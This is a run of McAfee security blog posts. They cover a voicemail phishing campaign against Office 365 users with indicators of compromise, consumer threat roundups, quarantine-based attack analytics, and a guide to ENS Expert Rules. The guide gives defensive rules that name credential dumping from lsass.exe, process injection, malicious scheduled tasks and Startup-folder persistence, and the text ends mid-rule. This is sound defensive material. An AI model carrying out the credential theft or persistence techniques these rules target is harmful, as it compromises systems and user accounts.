Over the past few weeks McAfee Labs has been observing a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. At first, we believed that only one phishing kit was being used to harvest the user’s credentials. However, during our investigation, we found three different malicious kits and evidence of several high-profile companies being targeted. McAfee Customers using VSE, ENS, Livesafe, WebAdvisor and MGW are protected against this phishing campaign.

The attack begins when the victim receives an email informing them that they have missed a phone call, along with a request to login to their account to access their voicemail.

An example of the malicious email is shown below:

The phishing email contains a HTML file as an attachment which, when loaded, will redirect the user to the phishing website. There are slight variations in the attachment, but the most recent ones contain an audio recording of someone talking which will lead the victim to believe they are listening to the beginning of a legitimate voicemail.

The HTML code which plays the recording is shown below:

Once redirected, the victim is shown the phishing page which asks them to log into their account. The email address is prepopulated when the website is loaded; this is another trick to reinforce the victim’s belief that the site is legitimate.

When the password is entered, the user is presented with the following successful login page and redirected to the office.com login page.

We observed the following filenames being used for the attachments:

  • 10-August-2019.wav.html [Format: DD-Month-YYYY.wav.html]
  • 14-August-2019.html [Format: DD-Month-YYYY.html]
  • Voice-17-July2019wav.htm [Format: Voice- DD-MonthYYYYwav.htm]
  • Audio_Telephone_Message15-August-2019.wav.html [Format: Audio_Telephone_MessageDD-Month-YYYY.wav.html]

Phishing Sites

As explained in the introduction, we were surprised to observe three different phishing kits being used to generate the malicious websites. All three look almost identical but we were able to differentiate them by looking at the generated HTML code and the parameters which were accepted by the PHP script.

Voicemail Scmpage 2019 (Not a typo)

The first kit is being sold on an ICQ channel and the creator advertises it on social media. The kit goes by the name of ‘Voicemail Scmpage 2019’ and operates on a license key basis, where the license key is checked prior to the phishing site being loaded.

A snippet of the generated HTML code is shown below:

A file, data.txt, is created on the compromised website and it contains a list of visitors, including their IP address, web browsers and the date.

The following data is harvested from the victims and emailed to the owner of the phishing site:

  • Email
  • Password
  • IP Address
  • Region (Location)

Office 365 Information Hollar

The second phishing kit we discovered is called ‘Office 365 Information Hollar’. This kit is very similar to ‘Voicemail Scmpage 2019’ and gathers the same data, as shown in the image below:

Third “Unnamed” Kit

The final phishing kit is unbranded, and we could not find any attribution to it. This kit makes use of code from a previous malicious kit targeting Adobe users back in 2017. It is possible that the original author from 2017 has modified this kit, or perhaps more likely the old code has been re-used by a new group.

This kit also harvests the same data as the previous two. The ‘Unnamed Kit’ is the most prevalent malicious page we have observed while tracking these voicemail phishing campaigns.

Targeted Industries

During our investigation we observed the following industries being targeted with these types of phishing emails:

[Services includes tourism, entertainment, real estate and others which are too small to group]

A wide range of employees were targeted, from middle management to executive level staff. We believe that this is a ‘Phishing’ and ‘Whaling’ campaign.

Conclusion

The goal of malicious actors is to harvest as many credentials as possible, to gain access to potentially sensitive information and open the possibility of impersonation of staff, which could be very damaging to the company. The entered credentials could also be used to access other services if the victim uses the same password, and this could leave them open to a wider of range targeted attacks.

What sets this phishing campaign apart from others is the fact that it incorporates audio to create a sense of urgency which, in turn, prompts victims to access the malicious link. This gives the attacker the upper hand in the social engineering side of this campaign.

We urge all our readers to be vigilant when opening emails and to never open attachments from unknown senders. We also strongly advise against using the same password for different services and, if a user believes that his/her password is compromised, it is recommended to change it as soon as possible

It is highly recommended to use Two-Factor Authentication (2FA) since it provides a higher level of assurance than authentication methods based on Single-Factor Authentication (SFA), like the one that many users utilise for their Office 365 accounts.

When possible for enterprise customers, we recommend blocking .html and .htm attachments at the email gateway level so this kind of attack will not reach the final user.

Also, be sure to read our companion blog which details how you can stay safe from such phishing campaigns.

Indicators of Compromise

Email Attachment with the following filename:

10-August-2019.wav.html [Format: DD-Month-YYYY.wav.html]

14-August-2019.html [Format: DD-Month-YYYY.html]

Voice-17-July2019wav.htm [Format: Voice- DD-MonthYYYYwav.htm]

Audio_Telephone_Message15-August-2019.wav.html [Format: Audio_Telephone_MessageDD-Month-YYYY.wav.html]

McAfee Detections

HTML/Phishing.g V2 DAT = 9349, V3 DAT = 3800

HTML/Phishing.av V2 DAT = 9371, V3 DAT = 3821

HTML/Phishing.aw V2 DAT = 9371, V3 DAT = 3821

The hashes of the attachments will not be provided as this will provide information on the potential targets

Domains:

(Domains (all blocked by McAfee WebAdvisor)

h**ps://aws.oficce.cloudns.asia/live/?email=

h**ps://katiorpea.com/?email=

h**ps://soiuurea.com/?email=

h**ps://afaheab.com/?email=

h**ps://aheahpincpea.com/?email=

More Information on Phishing Attacks:

The post Office 365 Users Targeted by Voicemail Scam Pages appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/feed/ 0
A Cybersecurity Horror Story: Stay Secure From October’s Creepiest Threats https://www.mcafee.com/blogs/consumer/consumer-threat-notices/creepiest-threats/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/creepiest-threats/#respond Mon, 28 Oct 2019 18:10:37 +0000 https://securingtomorrow.mcafee.com/?p=97228

Halloween time is among us and ghosts and goblins aren’t the only things lurking in the shadows. This past month has brought a variety of spooky cyberthreats that haunt our networks and devices. From malicious malware to restricting ransomware, October has had its fair share of cyber-scares. Let’s take a look at what ghoulish threats […]

The post A Cybersecurity Horror Story: Stay Secure From October’s Creepiest Threats appeared first on McAfee Blogs.

]]>

Halloween time is among us and ghosts and goblins aren’t the only things lurking in the shadows. This past month has brought a variety of spooky cyberthreats that haunt our networks and devices. From malicious malware to restricting ransomware, October has had its fair share of cyber-scares. Let’s take a look at what ghoulish threats have been leading to some tricks (and no treats) around the cybersphere this month.

Ghostcat Malware

One ghost that recently caused some hocus pocus across the Web is Ghostcat-3PC. According to SC Magazine, the malware’s goal is to hijack users’ mobile browsing sessions.

The infection begins when a user visits a particular website and is served a malicious advertisement. Ghostcat fingerprints the browser to collect device information and determines if the ad is running on a genuine webpage. Ghostcat also checks if the ad is running on an online publishers’ page that has been specifically targeted by this campaign. If these conditions are met, then the malware serves a malicious URL linked to the ad.

From there, this URL delivers obfuscated JavaScript, which creates an obscure source or machine code. The attackers behind Ghostcat use this to trick the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack, like ensuring that the malware is being run on a mobile device and a mobile-specific browser, for example. If the malware concludes that the browsing environment fits the descriptions of their target, it will serve a fraudulent pop-up, leading the user to malicious content.

Bewitched WAV Files

Ghostcat isn’t the only way malware is being spread lately, as, according to ZDNet, attackers have manipulated WAV audio files to spread malware and cryptominers. By using a technique called stenography, malware authors can hide malicious code inside of a file that appears normal, which allows hackers to bypass security software and firewalls.

Previously, cybercriminals have used stenography revolving around image file formats like PNG or JPEG. However, these crooks have now upped the ante by using WAV audio files to hide different types of malware. Most recently, researchers found that this technique is used to hide DLLs, or dynamic link libraries that contain code and data that can be used by more than one program at the same time. If malware was already present on an infected host device, it would download and read the WAV file, extract the DLL, and install a cryptocurrency miner called XMRrig. Cryptocurrency miners compile all transactions into blocks to solve complicated mathematical problems and compete with other miners for bitcoins. To do this, miners need a ton of computer resources. As a result, miners tend to drain the victim’s device of its computer processor’s resources, creating a real cybersecurity headache.

MedusaLocker Ransomware

Finally, we have the mysterious MedusaLocker ransomware. According to BleepingComputer, this threat is slithering its way onto users’ devices, encrypting files until the victim purchases a decryptor.

This strain will perform various startup routines to prep the victim’s device for encryption. Additionally, it will ensure that Windows networking is running and mapped network drives (shortcuts to a shared folder on a remote computer or server) are accessible. Then, it will shut down security programs, clear data duplicates so they can’t be used to restore files, remove backups made with Windows backup, and disable the Windows automatic startup repair.

For each folder that contains an encrypted file, MedusaLocker creates a ransom note with two email addresses to contact for payment. However, it is currently unknown how much the attackers are demanding for the victim to have their files released or if they actually provide a decryptor once they receive a payment.

With all of these threats attempting to haunt networks and devices, what can users do to help themselves have a safe and secure spooky season? Follow these tips to keep cybersecurity tricks at bay:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those coming from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site.
  • If your computer slows down, be cautious. One way you can identify a cryptojacking attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing.
  • Use a comprehensive security solution. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post A Cybersecurity Horror Story: Stay Secure From October’s Creepiest Threats appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/creepiest-threats/feed/ 0
Did You Check Your Quarantine?! https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/#respond Mon, 28 Oct 2019 16:02:38 +0000 https://securingtomorrow.mcafee.com/?p=97203

A cost-effective way to detect targeted attacks in your enterprise While it is easy to get caught up in the many waves of new and exciting protection strategies, we have recently discovered an interesting approach to detect a targeted attack and the related actor(s). Quite surprisingly, a big part of the solution already exists in […]

The post Did You Check Your Quarantine?! appeared first on McAfee Blogs.

]]>

A cost-effective way to detect targeted attacks in your enterprise

While it is easy to get caught up in the many waves of new and exciting protection strategies, we have recently discovered an interesting approach to detect a targeted attack and the related actor(s). Quite surprisingly, a big part of the solution already exists in most enterprises: the tried, tested endpoint security platform. In this case, we used our own McAfee Endpoint Security (ENS). Along with ENS, we used GetQuarantine, a freeware tool from McAfee, and a third-party threat analytics service.

The Problem

We will begin with a working definition of a targeted attack:

A targeted attack is a threat in which a threat actor actively pursues and compromises a specific target. To achieve the goal, the adversary may adapt and improve their attack(s) to counter the victim’s defenses and persist at it for a long period of time.

What does this say? First, the adversary’s objective is to compromise a specific target, not just an arbitrary target. Second, the adversary is skilled enough to know how defenses work and is resourceful enough to actively adapt and improve their attack to beat defenses. Third, the adversary is determined enough to pursue the objective for perhaps an indefinite period of time.

Taken together, the above characteristics challenge most defense technologies. Why so? Because these characteristics run counter to the assumptions on which these technologies are based.

At the heart of it, most defense technologies are signature-based, where the signatures are created either by a human analyst, by a machine, or by using instances of known malicious behavior. The cost of constructing signatures is high and is amortized by using the same signature to defend against the same attack elsewhere.

Twenty years ago, when there were just a few thousand examples of malicious software around, it was relatively easy to find the origin, perpetrators, and the reason for the creation and release of a malicious file or application. Security researchers would manually analyze each sample, carefully identify similarities with previously known samples through sheer memory and label each sample with a unique name. This method worked well because the attacks then were opportunistic and aimed at spreading as wide as possible. This meant that anti-virus companies could discover an attack in one place, extract relevant detection signatures, and send the signature updates to its install base.

Now, security threat intelligence companies receive hundreds of thousands of new malware samples every day. There is simply not enough time or resources to analyze each malware to answer who, what, when, and why? The best any anti-virus software can do is to classify a file into just two bins: good or bad. It is impossible for researchers to manually look at every sample and process them to the same detail as before. To make matters worse, attacks today are targeted. Attackers create one-off variants aimed at a specific enterprise. This makes it virtually impossible to connect attacks across enterprises to understand the attacker.

And therein lies an important problem. Just as the numbers and sophistication of attacks have increased exponentially, the objective of tracking who is behind an attack, and identifying linkages between different malware samples and their authors, and the intent behind an attack, have been lost.

Why should it matter? In the absence of information about who is attempting to breach an organization, defenders are left operating in the dark. They make security decisions based on breaches that happen elsewhere using threat intelligence that is most often irrelevant, and when relevant, is most likely outdated.

The Solution

Analysis of targeted campaigns shows that programs that are part of an attack usually show a couple of similar characteristics. First, the malware or attack mechanism is focused on one enterprise or, at most, one sector and second, the malware program demonstrates evolutionary characteristics where the actor repeatedly unleashes different variants of it. Our proposed solution focuses on these characteristics and tries to uncover targeted campaigns by finding binary semantics between malware found in customer environments and known targeted campaigns.

Our solution strategy is:

Endpoint-security detects a malware sample. It is compared with a sample from a known targeted attack. If the similarity is high, it is a strong indication that the ENS detected sample is a part of that targeted attack and the threat actor is the same.

The strategy is implemented in three building blocks: sample collector, sample storage and targeted attack analysis using third-party threat analytics application.

Sample Collector (GetQuarantine)

Sample collection is performed using McAfee proprietary licensed freeware, GetQuarantine. GetQuarantine is a McAfee e-Policy Orchestrator (ePO) deployable tool that can run on all endpoints protected by McAfee ENS. GetQuarantine runs as an ePO scheduled product deployment task. ENS cleans or deletes items that are detected as threats and saves copies in a non-executable format to the Quarantine folder. The GetQuarantine tool on a scheduled run, checks the quarantine folder and uploads items to the McAfee backend if items are not already uploaded during previous tool runs.

Sample Storage (McAfee Workflow & AWS)

The McAfee workflow backend receives sample submissions from GetQuarantine and stores them in an S3 bucket. Samples are segregated per enterprise and made available for further analysis. Third-party analytics applications like MAGIC can be run on samples to extract targeted attack insights. Analytics services are available to McAfee customers participating in a third-party analytics program. For customers that do not participate in a third-party analytics program, sample processing ends at the McAfee backend layer and the sample eventually gets deleted without further analysis.

Targeted Attack Analysis

For our pilot implementation we used Cythereal MAGIC services. The McAfee backend submits samples to MAGIC for binary similarity analysis. Customers can check analysis reports using Cythereal website. Cythereal is McAfee’s Security Innovation Alliance (SIA) partner.

Cythereal MAGIC™ (malware genomic correlation) is a web-service touted as “BinDiff on Steroids”. The system carries out semantic similarity analysis of programs using advanced program analysis techniques at the assembly instruction-level code. The semantics of the program gives more meaningful insights than structural or behavioral characteristics. MAGIC can find similarity between samples submitted using GetQuarantine and also find variants of those samples from MAGIC’s database. It has the facility to provide alerts for campaign detections and can generate YARA rules that can be used for searching other services, like VirusTotal.

We first tried human-driven in-house analysis using open source tools like SSDEEP, SDHASH, TLSH, etc. to prove the concept of identifying targeted attacks using the binary similarity of samples found in quarantine. Though we were successful in proving this concept with these open source tools, they were not very effective, especially with polymorphic variants, so we explored third-party options and identified Cythereal MAGIC™.

Architecture

Figure 1 shows the overall architecture of our system:

[Figure 1: McAfee ENS detects a suspicious sample by studying its behavior or other means and then moves the sample file to the quarantine folder. The scheduled execution of the GetQuarantine Tool configured in ePO as a scheduled task submits the sample to the McAfee backend. The third-party analytics app, periodically receives samples from McAfee backend for further analysis.]

Case Study

For a case study, we used samples from a McAfee discovered campaign, Oceansalt. We tested the solution’s ability to group samples using semantic similarity and also tested the solution’s ability to identify new variants of Oceansalt samples.

Illustration of the Solution’s Ability to Group Malware From Quarantine

McAfee Endpoint Security (ENS) detected two samples of Oceansalt (as listed in Table 1). GetQuarantine submitted these samples to the McAfee backend. Targeted attack analysis of these files showed a semantic similarity of 95.1%. The comparison of their control-flow graphs in Figure 2 justifies the high semantic similarity score.

[Table 1: Oceansalt samples reported by McAfee™ security operation center in June-July 2018.]

[Figure 2: Control-flow graph of Oceansalt samples from Table 1]

Illustration of the Solution’s Ability to Link New Variants From the Wild to a Known Targeted Attack

Finally, we come to the use case that motivated this study. Malware belonging to a targeted attack is identified by its file-hashes. However, attackers use polymorphism and other obfuscations to create new variants. Though McAfee ENS may block such variants, it may not link it to the original attack. Targeted attack analytics can help fill this void.

To test the solution’s ability to locate such targeted attacks, we uploaded an Oceansalt sample (MD5: 531DEE019792A089A4589C2CCE3DAC95 [VT]) to MAGIC and identified it as an APT. We then uploaded a large number (thousands) of malware samples via GetQuarantine. As we had thought, targeted attack analytics sent an alert that it had detected variants of Oceansalt (Figure 3).

[Figure 3: Alert about detecting an Oceansalt variant in the quarantine]

MAGIC’s alert was triggered because it found two Oceansalt variants from the wild which were not previously reported by the McAfee SOC or any other global threat intelligence.

[Table 2: Two new variants of Oceansalt samples found using semantic similarity]

Try Your Quarantine

We tested the GetQuarantine-based solution in our lab and found encouraging results. If you would like to try out this solution use the following steps, along with McAfee Endpoint Security (ENS):

  • Download the beta version of GetQuarantine, a proprietary licensed freeware.
  • Deploy it using the ePO ecosystem.
  • On successful sample submission to the McAfee backend, receive an acknowledgment email.

To obtain analysis results from the third-party analytics app, follow these steps:

  • Visit Cythereal MAGIC™.
  • The MAGIC dashboard contains plots with details about various ongoing campaigns.
  • Upon selecting a campaign in the plot, a table with all the associated malware is displayed where the customer can download samples and YARA rules.
  • Whenever MAGIC detects a targeted attack, it sends an alert email to the registered email address of the customer, along with additional threat intelligence, such as information on the threat group, third-party research on the group, and associated IoCs. Customers can also see the list of alerts on the MAGIC website.

Summary

As you can see from this exercise, traditional AV still has lot to offer and can play an important role in overall security strategy againt targeted attacks. We can amplify signals coming out of AV detections using tools like GetQuarantine and by running analytics on quarantine artifacts to uncover targeted attacks. We can take an incremental approach in solving targeted attack challenges.

The post Did You Check Your Quarantine?! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/feed/ 0
7 Ways to Help Girls Pursue Their Passion for Tech https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/ https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/#respond Sat, 26 Oct 2019 14:00:19 +0000 https://securingtomorrow.mcafee.com/?p=97218

One of my favorite binges of late is the Netflix series Halt and Catch Fire. It’s a story about the personal computer revolution of the 1980s. The lead character, Cameron Howe, is a brilliant, self-assured young woman who runs circles around her, mostly male, co-workers, with her mad coding skills. I remember being influenced by a […]

The post 7 Ways to Help Girls Pursue Their Passion for Tech appeared first on McAfee Blogs.

]]>

One of my favorite binges of late is the Netflix series Halt and Catch Fire. It’s a story about the personal computer revolution of the 1980s. The lead character, Cameron Howe, is a brilliant, self-assured young woman who runs circles around her, mostly male, co-workers, with her mad coding skills.

I remember being influenced by a similar female lead. It was Jane Craig (played by Holly Hunter) in the movie Broadcast News. As the credits rolled, I knew I wanted to be a journalist. Likewise, Cameron Howe (played by Mackenzie Davis) possesses just the right mix of courage and intellect required to spark the tech fire in girls today.

STEM and beyond

What better way to close out our National Cybersecurity Awareness Month (NCSAM) series than to encourage the next generation of cybersecurity superheroes to grow their STEM (Science, Technology, Engineering, Math) skills and consider a future in cybersecurity?

Cybersecurity is a rewarding career, boasting an average salary of $96,000, and yet few women pursue the field. According to The U.S. Department of Labor, employment opportunities for Information Security Analysts will grow by 28% between 2016 and 2026. It’s also predicted that 3.5 million jobs in cybersecurity will remain unfilled by 2021.

Why focus on girls? Because while the numbers are improving, in the tech field or otherwise, in 2019, women are still paid 80 cents for every dollar their male counterparts earn, and 93.4 percent of Fortune 500 CEOs are men.

If your daughter shows a talent for tech, here are a few ways to nurture that passion.

  1. Challenge stereotypes. Girls get steeped in pink from the moment they arrive in the delivery room. This “pinkification,” in general, experts argue, is one factor distracting girls from pursuing tech. Consider the conscious and even unconscious ways you may be deterring your daughter from pursuing traditionally male subjects such as computers, engineering, robotics, or programming. Challenge perceptions like a 2012 Girl Scouts found there’s a common belief that girls are not high achievers in math and science. However, a study by the American Association of University Women found high school girls and boys perform equally in the subjects.
  2. Expose her to the rock stars. Women like YouTube CEO Susan Wojcicki, Facebook’s Sheryl Sandberg, HP’s Meg Whitman, and Google coder Marisa Mayer are great role models for girls today. Also, choose media (check ratings before viewing to stay age-appropriate) with strong female leads who excel in tough career fields.
  3. Ask her. How many times do we make assumptions and skip this crucial step in parenting? Ask your daughter what camps appeal most to her, what activities she enjoys, what qualities she admires most in others, and what she dreams of achieving.
  4. Don’t overdo it. If your daughter has a natural ability in STEM subjects, don’t push too hard. She will find her path. Suggest adjacent activities to complement her strengths. Is she good at math? Encourage a musical instrument as a hobby. Good at science? Suggest cooking or gardening to compliment her love for creative problem-solving. Integrate creative activities such as art, writing, or theatre.
  5. Seek out tech opportunities. Few kids will pursue experiences on their own, so consider giving them a nudge. Encourage age-appropriate camps, clubs, and activities that play to her strengths. The choices in quality camps — rocketry, science, coding, physics — are endless. Be your daughter’s tech companion. Take her to a women’s tech conference so she can begin to visualize her future and meet women who work in the field. Encourage an internship or even a job shadowing opportunity during high school or college, like this one that changed Gwendolyn’s career path.
  6. Model, teach resilience. The tech field tends to be a male-dominated culture of “brogrammers,” which can be intimidating for women. For this reason, your daughter may need to develop a tough skin and learn to push through obstacles with ease.
  7. Help her find her people. Organizations like Girls Go CyberstartGirls Who CodeCode.org, and uscyberpatriot.org can be game-changers for a tech-minded girl and help grow her passion among peers.

Cybersecurity is one of the fastest-growing, in-demand professions out there. With the rise in security breaches of all kinds, it’s also a field experts say is “future proof.” If your daughter shows a desire to fight the bad guys and make her mark safeguarding the digital realm, then cybersecurity may be the best place for her to start blazing her trails.

The post 7 Ways to Help Girls Pursue Their Passion for Tech appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/feed/ 0
McAfee Reveals the Most Dangerous Celebrities Across the Globe https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/#respond Fri, 25 Oct 2019 16:02:21 +0000 https://securingtomorrow.mcafee.com/?p=97200

Earlier this week, we revealed McAfee’s Most Dangerous Celebrity of 2019 in the U.S., Alexis Bledel. Growing from a young actress in “Gilmore Girls” to Ofglen in “A Handmaid’s Tale,” Bledel’s rising stardom helps to explain why she topped this year’s list. But, is that the case in other parts of the world as well? […]

The post McAfee Reveals the Most Dangerous Celebrities Across the Globe appeared first on McAfee Blogs.

]]>

Earlier this week, we revealed McAfee’s Most Dangerous Celebrity of 2019 in the U.S., Alexis Bledel. Growing from a young actress in “Gilmore Girls” to Ofglen in “A Handmaid’s Tale,” Bledel’s rising stardom helps to explain why she topped this year’s list. But, is that the case in other parts of the world as well? It’s time to take a trip around the globe and see which celebrities are considered risky in different regions.

In McAfee’s 13th annual study on the riskiest celebrities to search for online, the stars topping each list varied from country to country. While Bledel sits at the top of the most dangerous celebrity list in the U.S., singer Camila Cabello is ranked No. 1 in Spain. In Germany, model and TV personality Heidi Klum and actress Emilia Clarke tied each other for the country’s riskiest celebrity. Caroline Flack, the host of reality dating show “Love Island,” came in No. 1 in the U.K. In France, actor/producer Jamel Debbouze topped the list of the countries most dangerous celebrities. At the top of India’s most dangerous celebrity tally is international cricketer M.S. Dhoni. And, finally, rounding out the list of the riskiest celebrities around the world are comedian, actor, and TV host John Oliver in Australia and Malaysian actress Michelle Yeoh in Singapore.

Many users don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice users to click on dangerous links. And while this year’s list of riskiest celebrities might vary from country to country, cybercriminals’ use of trending celebrities and pop culture icons continues to be an avenue used to exploit users’ security. It’s for these reasons that users must understand the importance of taking precautions when it comes to searching for the latest news on their favorite celebrities.

So, whether you’re checking out what Alexis Bledel has been up to since “Gilmore Girls” or looking for the latest drama on “Love Island” with Caroline Flack, be a proactive fan and follow these security tips when browsing the internet:

  • Be careful what you click. Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.
  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.
  • Protect your online safety with a cybersecurity solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.
  • Use a website reputation tool. Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post McAfee Reveals the Most Dangerous Celebrities Across the Globe appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/feed/ 0
Using Expert Rules in ENS to Prevent Malicious Exploits https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/#respond Fri, 25 Oct 2019 15:41:38 +0000 https://securingtomorrow.mcafee.com/?p=97184

Expert Rules are text-based custom rules that can be created in the Exploit Prevention policy in ENS Threat Prevention 10.5.3+. Expert Rules provide additional parameters and allow much more flexibility than the custom rules that can be created in the Access Protection policy. It also allows system administration to control / monitor an endpoint system […]

The post Using Expert Rules in ENS to Prevent Malicious Exploits appeared first on McAfee Blogs.

]]>

Expert Rules are text-based custom rules that can be created in the Exploit Prevention policy in ENS Threat Prevention 10.5.3+. Expert Rules provide additional parameters and allow much more flexibility than the custom rules that can be created in the Access Protection policy. It also allows system administration to control / monitor an endpoint system at a very granular level. Expert rules do not rely on User-Mode hooking; hence they have very minimal impact on a system’s performance. This blog is created as a basic guide to show our customers how to create them and which threats they can help block. Further detailed information can be found in the conclusion.

How Expert Rules work

The following sections show how to add Expert rules via EPO and ENS.

Adding an Expert Rule from EPO

1. Select System Tree | Subgroup (e.g.: ens_10.6.0) | Assigned Policies | Product (Endpoint Security Threat Prevention) | Exploit Prevention (My Default)

2. Navigate to Signatures and click on Add Expert Rule.

3. In the Rules section, complete the fields.

a. Select the severity and action for the rule. The severity provides information only; it has no select on the rule action.

b. Select the type of rule to create. The Rule content field is populated with the template for the selected type.

c. Change the template code to specify the behavior of the rule.

When you select a new class type, the code in the Rule content field is replaced with the corresponding template code. Endpoint Security assigns the ID number automatically, starting with 20000. Endpoint Security does not limit the number of Expert Rules you can create.

4. Save the rule, then save the settings.

5. Enforce the policy to a client system.

6. Validate the new Expert Rule on the client system.

Adding an Expert Rule directly at the Endpoint:

If we need to add an expert rule from EPO it will be pushed to all endpoints of an entire EPO “WORKGROUP”. There could be situations where expert rules are required to be applied in one/two systems or ENS systems which are not managed by EPO (non-corporate environment where ENS is installed from a standalone setup); in those cases, the expert rule must be added directly at the endpoint. Expert rules can be written and applied directly at the Endpoint system using McAfee Endpoint Security UI. Steps are below:

1. Open McAfee Endpoint Security. Go to Settings.

2. Go to Threat Prevention | Show Advanced.

3. Scroll Down to Expert Rule Section and then click on Add Expert Rule.

4. The expert rule compiler should pop up where an end user can directly write and compile expert rules and, upon compilation, enforce the rules to the system.

If there is no syntax error in the expert rule it can be applied in the system by clicking on the Enforce button. In case there is a syntax error, the details can be found in log file  %ProgramData%\McAfee\Endpoint Security\Logs\ExploitPrevention_Debug.log

Testing the Rules

When new rules are created, they should first be tested in ‘Report’ mode so that the detections can be observed. When enough confidence in the rule has been gained, it can be turned to ‘Block’ mode.

Expert Rule Examples:

 

Basic Rule:

The following rule will detect an instance of cmd.exe creating any file at c:\temp. Please note that cmd.exe might be run by any user and from any part of the system.

Rule {

Process {

Include OBJECT_NAME { -v “cmd.exe” }

}

Target {

Match FILE {

Include OBJECT_NAME { -v “c:\\temp\\**” }

Include -access “CREATE”

}

}

}

 

Rules which target specific malicious behavior:

The following rules can be created to help block specific malicious activity which is performed by various malware families and attack techniques.

 

Expert Rule to Block Remote Process Injection [MITRE Technique Process Injection T1055]:

Rule {

Process {

Include OBJECT_NAME { -v “**” }

Exclude OBJECT_NAME { -v “SYSTEM” }

Exclude OBJECT_NAME { -v “%windir%\\System32\\WBEM\\WMIPRVSE.EXE” }

Exclude OBJECT_NAME { -v “%windir%\\System32\\CSRSS.EXE” }

Exclude OBJECT_NAME { -v “%windir%\\System32\\WERFAULT.EXE” }

Exclude OBJECT_NAME { -v “%windir%\\System32\\SERVICES.EXE” }

Exclude OBJECT_NAME { -v “*\\GOOGLE\\CHROME\\APPLICATION\\CHROME.EXE” }

}

Target {

Match THREAD {

Include OBJECT_NAME { -v “**” }

Exclude OBJECT_NAME { -v “**\\MEMCOMPRESSION” }

Exclude OBJECT_NAME { -v “%windir%\\System32\\WERFAULT.EXE” }

Include -access “WRITE”

}

}

}

 

Expert Rule which prevents powershell.exe and powershell_ise.exe process from dumping credentials by accessing lsass.exe memory [ MITRE Technique Credential Dumping T1003 ]:

Rule {

Process {

Include OBJECT_NAME {  -v “powershell.exe”  }

Include OBJECT_NAME {  -v “powershell_ise.exe”  }

Exclude VTP_PRIVILEGES -type BITMASK { -v 0x8 }

}

Target {

Match PROCESS {

Include OBJECT_NAME {   -v  “lsass.exe”  }

Include -nt_access “!0x10”

Exclude -nt_access “!0x400”

}

}

}

 

Expert Rule which prevents creation of a suspicious task (PowerShell script or batch file) using “SchTasks.exe” utility [MITRE Technique Scheduled Task T1053]:

Rule {

Process {

Include OBJECT_NAME { -v  “SchTasks.exe” }

Include PROCESS_CMD_LINE { -v “*/Create*” }

}

Target {

Match PROCESS {

Include PROCESS_CMD_LINE { -v “**.bat**” }

}

Match PROCESS {

Include PROCESS_CMD_LINE { -v “**.ps1**” }

}

}

}

 

Expert Rule to prevent Start Up Entry Creation [ MITRE Technique Persistence T1060]:

Adversaries can use several techniques to maintain persistence through system reboots. One of the most popular techniques is creating entries in the Start Up folder. The following expert rule will prevent any process from creating files in the Start Up folder. Recently, the internet has witnessed a full-fledged exploit of a decade old WinRAR vulnerability (CVE-2018-20251) which can be exploited by dropping files in the Start Up directory. The following expert rule will also block such an attempt.

Rule {

Process {

Include OBJECT_NAME { -v ** }

}

Target {

Match FILE {

Include OBJECT_NAME { -v “**\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\**” }

Include -access “CREATE WRITE”

}

}

}

 

Expert Rule which blocks JavaScript Execution within Adobe Reader:

Exploiting a client-side software vulnerability to gain an initial foothold in a network is not new [MITRE Technique T1203]. Adobe Reader is a very popular target because, like any other browser, it supports JavaScript which makes exploitation much easier. The following expert rule can be deployed in any network to prevent Adobe Reader from executing any kind of JavaScript.

Rule {

Process {

